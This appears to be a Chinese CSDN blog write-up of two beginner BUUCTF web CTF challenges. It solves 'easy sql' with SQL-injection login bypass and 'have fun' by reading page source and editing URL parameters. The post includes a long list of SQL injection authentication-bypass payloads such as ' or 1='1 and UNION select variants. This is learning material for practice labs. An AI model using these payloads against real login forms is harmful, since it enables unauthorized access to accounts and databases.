BUUCTF--web(easy sql ,have fun)

最新推荐文章于 2024-08-30 13:51:08 发布
最新推荐文章于 2024-08-30 13:51:08 发布
阅读量89 收藏
点赞数
分类专栏: CTF初次做题 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45849014/article/details/132122632
版权

easy sql

1.进入靶机

2.然后,先进行简单的sql注入

sql注入有 

3.万能密码进行尝试,获取flag

 重点:万能密码

sql注入之万能密码总结_sql万能密码_echokp的博客-CSDN博客

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1

have fun

1.进入图形界面后,可以查看网页源代码

 

进行代码审计,然后发现如图的地方我们可以进行进一步不的探索

2.在url框中,实现 

 重点:url

查询资料:

URL的概念与组成_url组成_小宝的宝呢的博客-CSDN博客

1.url由四个部分组成

协议、主机、端口、路径

 

协议(HTTP):规定数据传输的方式

域名(IP):在网络环境中找到主机-------用 :// 与协议分隔开

端口(port):(常省略)在网络主机上,标识一个进程(应用程序)------用  :  与域名分隔开

资源路径:标识网络资源(文件,图片,音视频,变量...)------用 :// 与端口分隔开

查询参数:传递给资源路径对应的数据------用  ?  与资源路径分隔开,查询内部参数用  &  分隔多个键值对;当没有资源路径时,可以默认是 ,在各个网站通常有默认的路径如index.html

觉年
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-WEB
ccfly1012的博客
11-02 3840
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-WEB刷题记录-1
weixin_44145820的博客
04-06 875
目录[HCTF 2018]WarmUp[强网杯 2019]随便注[护网杯 2018]easy_tornado[SUCTF 2019]EasySQL[HCTF 2018]admin[RoarCTF 2019]Easy Calc[极客大挑战 2019]EasySQL[强网杯 2019]高明的黑客[极客大挑战 2019]Havefun[SUCTF 2019]CheckIn[CISCN2019 华北赛区 ...
BUUCTF-web
weixin_43896504的博客
07-21 409
BUUCTF
BUUCTF-WEB(1-16)
菜鸡程序员的博客
01-26 1776
BUUCTF-WEB(1-16) 1.[HCTF 2018]WarmUp ​ 根据点开靶机时的一个提示:代码审计,可知主要考察代码审计,在点开靶机之后,出现了一个滑稽表情,右键检查网页源码,发现在图片的上方有个注释 ,<!--source.php-->感觉像是个有用的信息,于是在网页的链接后边加上/source.php页面上出现了代码 <?php highlight_file(__FILE__); class emmm { public stati
Buuctf -web wp汇总(二)
Alexhirchi的博客
06-27 2333
文章目录[ASIS 2019]Unicorn shop[网鼎杯 2020 青龙组]AreUSerialz [ASIS 2019]Unicorn shop 要点:Unicode安全设计 题目要求,当我们买下商品4,获得flag(买其他商品会提示,商品错误),但它只允许输入一个字符,而商品4要求价格为1337.0 。这里利用的就是Unicode的设计漏洞问题,该网站是UTF-8编码。给一个Unicode>1337的值就可以获得flag,可以通过网站获取一些特殊字符ↂ(查询thousand关键字) 参考链
题解记录-BUUCTF|Web (持续更新中)
weixin_57448435的博客
09-17 2606
BUUCTF Web
从0到1——BUUCTF-Web刷题之旅
weixin_45848585的博客
12-29 3364
[HCTF 2018]WarmUp 查看网页源码 发现存在source.php 于是查看source.php http://0df7b2a6-36eb-4766-8481-62b98f795732.node3.buuoj.cn/source.php 查看source.php应该为index.php的代码 同时发现存在hint.php文件 查看发现存在提示信息 //source.php //代码包含两部分 定义emmm类用于check以及对传入参数进行校验 令一部分为对传入的file参数进行校验 <?
Buuctf -web wp汇总(一)
Alexhirchi的博客
05-07 6108
BuuCTF平台 [极客大挑战 2019]EasySQL1 访问,一个登陆界面 尝试随意登录,提示账号和密码错误 构造点在url,账号密码再url中,尝试构造恶意SQL语句,发现是最基本的报错型注入,无过滤。典型的’ # 闭合,先判断出3列,再用联合查询 'select 1,2,3 %23 直接获得了flag。利用万能密码也可以获得flag [极客大挑战 2019]LoveSQL1 访问,是一个登...
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3743
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客大挑战 2019]Http 修改头 [...
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7576
攻防世界 -- very_easy_sql
buuctf-web-[强网杯 2019]随便注-wp
居上
06-22 1365
[强网杯 2019]随便注 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
BUUCTF-easy_tornado
wuerror的博客
07-07 3648
这题是2018护网杯原题的复现。 进去之后显示三个txt,每个点进去看看。内容如下: /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 看看url,发现web9.buuoj.cn/file?filename=/flag.txt&fil...
漏洞披露-金慧-综合管理信息系统-SQL
无问社区的博客
08-27 481
金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL统计行数的语句
曹昆的技术博客
08-27 354
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。
在Postgresql中计算工单的对应的GPS轨迹距离
最新发布
专注GIS软件开发。
08-30 285
在某个App开发中,要求记录用户的日常轨迹,在用户巡逻设备的时,将记录的轨迹点当做该设备巡逻时候的轨迹。由于业务逻辑上没有明确的指示人员巡逻工单-GPS位置之间的关系,所以通过时间关系进行轨迹划定。
PostgreSQL-物理备份工具PGbackrest使用教程
侯晓阳的博客
08-27 459
PGSQL非常强大的物理备份工具,pgbackrest,支持增量、压缩、从库备份远程备份、加密备份等。
SQL 注入新视角:堆查询、JSON 与头部 XFF 注入剖析及防范
2301_77160226的博客
08-27 2094
SQL 注入攻击的世界中,除了一些常见的注入方式外,还有堆查询注入、JSON 注入以及头部 XFF 注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种 SQL 注入攻击方式的原理和特点。
PostgreSQL如何设置主键自增(序列、SERIAL)
西京刀客
08-26 1168
在使用Mysql时,创建表结构时可以通过关键字auto_increment来指定主键是否自增。但在Postgresql数据库中,虽然可以实现字段的自增,但从本质上来说却并不支持Mysql那样的自增。
buuctf web easy sql
12-18
根据提供的引用内容,buuctf web easy sql 是一个关于SQL注入的题目。根据引用[1],给出的SQL语句是一个拼接字符串的方式,其中包含了一个注入点。而引用中提到的sql_mode中的PIPES_AS_CONCAT选项将 || 视为字符串的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值